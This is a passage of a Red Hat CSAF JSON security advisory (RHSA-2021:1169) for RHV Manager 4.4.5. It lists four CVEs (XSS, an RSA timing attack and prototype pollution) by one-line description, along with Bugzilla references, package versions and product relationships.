"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update is now available for Red Hat Virtualization Engine 4.4.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "The ovirt-engine package provides the manager for virtualization environments.\nThis manager enables admins to define hosts and networks, as well as to add\nstorage, create VMs and manage user permissions.\n\nA list of bugs fixed in this update is available in the Technical Notes\nbook:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_virtualization/4.4/html-single/technical_notes\n\nSecurity Fix(es):\n\n* nodejs-bootstrap-select: not escaping title values on \u003coption\u003e may lead to XSS (CVE-2019-20921)\n\n* m2crypto: bleichenbacher timing attacks in the RSA decryption API (CVE-2020-25657)\n\n* datatables.net: prototype pollution if \u0027constructor\u0027 were used in a data property name (CVE-2020-28458)\n\n* nodejs-immer: prototype pollution may lead to DoS or remote code execution (CVE-2020-28477)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2021:1169",
"url": "https://access.redhat.com/errata/RHSA-2021:1169"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#moderate",
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"category": "external",
"summary": "https://access.redhat.com/documentation/en-us/red_hat_virtualization/4.4/html-single/technical_notes",
"url": "https://access.redhat.com/documentation/en-us/red_hat_virtualization/4.4/html-single/technical_notes"
},
{
"category": "external",
"summary": "1145658",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1145658"
},
{
"category": "external",
"summary": "1155275",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1155275"
},
{
"category": "external",
"summary": "1649479",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1649479"
},
{
"category": "external",
"summary": "1666786",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1666786"
},
{
"category": "external",
"summary": "1688186",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1688186"
},
{
"category": "external",
"summary": "1729359",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1729359"
},
{
"category": "external",
"summary": "1787235",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1787235"
},
{
"category": "external",
"summary": "1802844",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1802844"
},
{
"category": "external",
"summary": "1837221",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1837221"
},
{
"category": "external",
"summary": "1843882",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1843882"
},
{
"category": "external",
"summary": "1858420",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1858420"
},
{
"category": "external",
"summary": "1882273",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1882273"
},
{
"category": "external",
"summary": "1884233",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1884233"
},
{
"category": "external",
"summary": "1889823",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1889823"
},
{
"category": "external",
"summary": "1895217",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1895217"
},
{
"category": "external",
"summary": "1901503",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1901503"
},
{
"category": "external",
"summary": "1901752",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1901752"
},
{
"category": "external",
"summary": "1905108",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1905108"
},
{
"category": "external",
"summary": "1905158",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1905158"
},
{
"category": "external",
"summary": "1908441",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1908441"
},
{
"category": "external",
"summary": "1910302",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1910302"
},
{
"category": "external",
"summary": "1913198",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1913198"
},
{
"category": "external",
"summary": "1914602",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1914602"
},
{
"category": "external",
"summary": "1918162",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1918162"
},
{
"category": "external",
"summary": "1919555",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1919555"
},
{
"category": "external",
"summary": "1921104",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1921104"
},
{
"category": "external",
"summary": "1921119",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1921119"
},
{
"category": "external",
"summary": "1922200",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1922200"
},
{
"category": "external",
"summary": "1924012",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1924012"
},
{
"category": "external",
"summary": "1926854",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1926854"
},
{
"category": "external",
"summary": "1927851",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1927851"
},
{
"category": "external",
"summary": "1931514",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1931514"
},
{
"category": "external",
"summary": "1931786",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1931786"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_1169.json"
}
],
"title": "Red Hat Security Advisory: RHV Manager (ovirt-engine) 4.4.z [ovirt-4.4.5] security, bug fix, enhancement",
"tracking": {
"current_release_date": "2025-10-09T20:24:44+00:00",
"generator": {
"date": "2025-10-09T20:24:44+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.6.9"
}
},
"id": "RHSA-2021:1169",
"initial_release_date": "2021-04-14T16:34:39+00:00",
"revision_history": [
{
"date": "2021-04-14T16:34:39+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2021-04-14T16:34:39+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2025-10-09T20:24:44+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product": {
"name": "RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:rhev_manager:4.4:el8"
}
}
}
],
"category": "product_family",
"name": "Red Hat Virtualization"
},
{
"branches": [
{
"category": "product_version",
"name": "apache-sshd-0:2.6.0-1.el8ev.src",
"product": {
"name": "apache-sshd-0:2.6.0-1.el8ev.src",
"product_id": "apache-sshd-0:2.6.0-1.el8ev.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/apache-sshd@2.6.0-1.el8ev?arch=src"
}
}
},
{
"category": "product_version",
"name": "ansible-runner-service-0:1.0.7-1.el8ev.src",
"product": {
"name": "ansible-runner-service-0:1.0.7-1.el8ev.src",
"product_id": "ansible-runner-service-0:1.0.7-1.el8ev.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-runner-service@1.0.7-1.el8ev?arch=src"
}
}
},
{
"category": "product_version",
"name": "ansible-runner-0:1.4.6-2.el8ar.src",
"product": {
"name": "ansible-runner-0:1.4.6-2.el8ar.src",
"product_id": "ansible-runner-0:1.4.6-2.el8ar.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-runner@1.4.6-2.el8ar?arch=src"
}
}
},
{
"category": "product_version",
"name": "ovirt-web-ui-0:1.6.7-1.el8ev.src",
"product": {
"name": "ovirt-web-ui-0:1.6.7-1.el8ev.src",
"product_id": "ovirt-web-ui-0:1.6.7-1.el8ev.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-web-ui@1.6.7-1.el8ev?arch=src"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-dwh-0:4.4.5.5-1.el8ev.src",
"product": {
"name": "ovirt-engine-dwh-0:4.4.5.5-1.el8ev.src",
"product_id": "ovirt-engine-dwh-0:4.4.5.5-1.el8ev.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-dwh@4.4.5.5-1.el8ev?arch=src"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-0:4.4.5.9-0.1.el8ev.src",
"product": {
"name": "ovirt-engine-0:4.4.5.9-0.1.el8ev.src",
"product_id": "ovirt-engine-0:4.4.5.9-0.1.el8ev.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine@4.4.5.9-0.1.el8ev?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "apache-sshd-0:2.6.0-1.el8ev.noarch",
"product": {
"name": "apache-sshd-0:2.6.0-1.el8ev.noarch",
"product_id": "apache-sshd-0:2.6.0-1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/apache-sshd@2.6.0-1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "apache-sshd-javadoc-0:2.6.0-1.el8ev.noarch",
"product": {
"name": "apache-sshd-javadoc-0:2.6.0-1.el8ev.noarch",
"product_id": "apache-sshd-javadoc-0:2.6.0-1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/apache-sshd-javadoc@2.6.0-1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ansible-runner-service-0:1.0.7-1.el8ev.noarch",
"product": {
"name": "ansible-runner-service-0:1.0.7-1.el8ev.noarch",
"product_id": "ansible-runner-service-0:1.0.7-1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-runner-service@1.0.7-1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ansible-runner-0:1.4.6-2.el8ar.noarch",
"product": {
"name": "ansible-runner-0:1.4.6-2.el8ar.noarch",
"product_id": "ansible-runner-0:1.4.6-2.el8ar.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-runner@1.4.6-2.el8ar?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3-ansible-runner-0:1.4.6-2.el8ar.noarch",
"product": {
"name": "python3-ansible-runner-0:1.4.6-2.el8ar.noarch",
"product_id": "python3-ansible-runner-0:1.4.6-2.el8ar.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-ansible-runner@1.4.6-2.el8ar?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-web-ui-0:1.6.7-1.el8ev.noarch",
"product": {
"name": "ovirt-web-ui-0:1.6.7-1.el8ev.noarch",
"product_id": "ovirt-web-ui-0:1.6.7-1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-web-ui@1.6.7-1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-dwh-0:4.4.5.5-1.el8ev.noarch",
"product": {
"name": "ovirt-engine-dwh-0:4.4.5.5-1.el8ev.noarch",
"product_id": "ovirt-engine-dwh-0:4.4.5.5-1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-dwh@4.4.5.5-1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-dwh-grafana-integration-setup-0:4.4.5.5-1.el8ev.noarch",
"product": {
"name": "ovirt-engine-dwh-grafana-integration-setup-0:4.4.5.5-1.el8ev.noarch",
"product_id": "ovirt-engine-dwh-grafana-integration-setup-0:4.4.5.5-1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-dwh-grafana-integration-setup@4.4.5.5-1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-dwh-setup-0:4.4.5.5-1.el8ev.noarch",
"product": {
"name": "ovirt-engine-dwh-setup-0:4.4.5.5-1.el8ev.noarch",
"product_id": "ovirt-engine-dwh-setup-0:4.4.5.5-1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-dwh-setup@4.4.5.5-1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-backend-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "ovirt-engine-backend-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "ovirt-engine-backend-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-backend@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-dbscripts-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "ovirt-engine-dbscripts-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "ovirt-engine-dbscripts-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-dbscripts@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-health-check-bundler-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "ovirt-engine-health-check-bundler-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "ovirt-engine-health-check-bundler-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-health-check-bundler@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-restapi-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "ovirt-engine-restapi-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "ovirt-engine-restapi-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-restapi@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-setup-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "ovirt-engine-setup-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "ovirt-engine-setup-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-setup@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-setup-base-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "ovirt-engine-setup-base-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "ovirt-engine-setup-base-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-setup-base@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-setup-plugin-cinderlib-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "ovirt-engine-setup-plugin-cinderlib-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "ovirt-engine-setup-plugin-cinderlib-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-setup-plugin-cinderlib@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-setup-plugin-imageio-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "ovirt-engine-setup-plugin-imageio-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "ovirt-engine-setup-plugin-imageio-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-setup-plugin-imageio@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-setup-plugin-ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "ovirt-engine-setup-plugin-ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "ovirt-engine-setup-plugin-ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-setup-plugin-ovirt-engine@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-setup-plugin-ovirt-engine-common-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "ovirt-engine-setup-plugin-ovirt-engine-common-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "ovirt-engine-setup-plugin-ovirt-engine-common-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-setup-plugin-ovirt-engine-common@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-setup-plugin-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "ovirt-engine-setup-plugin-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "ovirt-engine-setup-plugin-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-setup-plugin-vmconsole-proxy-helper@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-setup-plugin-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "ovirt-engine-setup-plugin-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "ovirt-engine-setup-plugin-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-setup-plugin-websocket-proxy@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-tools-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "ovirt-engine-tools-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "ovirt-engine-tools-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-tools@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-tools-backup-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "ovirt-engine-tools-backup-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "ovirt-engine-tools-backup-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-tools-backup@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "ovirt-engine-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "ovirt-engine-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-vmconsole-proxy-helper@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-webadmin-portal-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "ovirt-engine-webadmin-portal-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "ovirt-engine-webadmin-portal-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-webadmin-portal@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ovirt-engine-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "ovirt-engine-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "ovirt-engine-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ovirt-engine-websocket-proxy@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3-ovirt-engine-lib-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "python3-ovirt-engine-lib-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "python3-ovirt-engine-lib-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-ovirt-engine-lib@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "rhvm-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "rhvm-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "rhvm-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rhvm@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
}
],
"category": "architecture",
"name": "noarch"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-runner-0:1.4.6-2.el8ar.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.noarch"
},
"product_reference": "ansible-runner-0:1.4.6-2.el8ar.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-runner-0:1.4.6-2.el8ar.src as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.src"
},
"product_reference": "ansible-runner-0:1.4.6-2.el8ar.src",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-runner-service-0:1.0.7-1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.noarch"
},
"product_reference": "ansible-runner-service-0:1.0.7-1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-runner-service-0:1.0.7-1.el8ev.src as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.src"
},
"product_reference": "ansible-runner-service-0:1.0.7-1.el8ev.src",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "apache-sshd-0:2.6.0-1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.noarch"
},
"product_reference": "apache-sshd-0:2.6.0-1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "apache-sshd-0:2.6.0-1.el8ev.src as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.src"
},
"product_reference": "apache-sshd-0:2.6.0-1.el8ev.src",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "apache-sshd-javadoc-0:2.6.0-1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:apache-sshd-javadoc-0:2.6.0-1.el8ev.noarch"
},
"product_reference": "apache-sshd-javadoc-0:2.6.0-1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-0:4.4.5.9-0.1.el8ev.src as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.src"
},
"product_reference": "ovirt-engine-0:4.4.5.9-0.1.el8ev.src",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-backend-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-backend-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "ovirt-engine-backend-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-dbscripts-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-dbscripts-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "ovirt-engine-dbscripts-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-dwh-0:4.4.5.5-1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.noarch"
},
"product_reference": "ovirt-engine-dwh-0:4.4.5.5-1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-dwh-0:4.4.5.5-1.el8ev.src as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.src"
},
"product_reference": "ovirt-engine-dwh-0:4.4.5.5-1.el8ev.src",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-dwh-grafana-integration-setup-0:4.4.5.5-1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-dwh-grafana-integration-setup-0:4.4.5.5-1.el8ev.noarch"
},
"product_reference": "ovirt-engine-dwh-grafana-integration-setup-0:4.4.5.5-1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-dwh-setup-0:4.4.5.5-1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-dwh-setup-0:4.4.5.5-1.el8ev.noarch"
},
"product_reference": "ovirt-engine-dwh-setup-0:4.4.5.5-1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-health-check-bundler-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-health-check-bundler-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "ovirt-engine-health-check-bundler-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-restapi-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-restapi-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "ovirt-engine-restapi-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-setup-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
